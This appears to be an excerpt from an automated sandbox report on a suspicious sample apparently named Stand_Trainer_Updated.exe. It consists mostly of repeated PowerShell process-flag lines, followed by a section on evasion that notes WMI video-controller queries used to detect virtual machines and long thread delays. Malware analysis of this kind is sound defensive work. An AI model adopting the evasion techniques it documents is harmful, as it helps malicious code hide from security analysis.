Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeMemory allocated: 1DD2D630000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeMemory allocated: 1DD46E90000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4710Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5169Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1353Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4809Jump to behavior
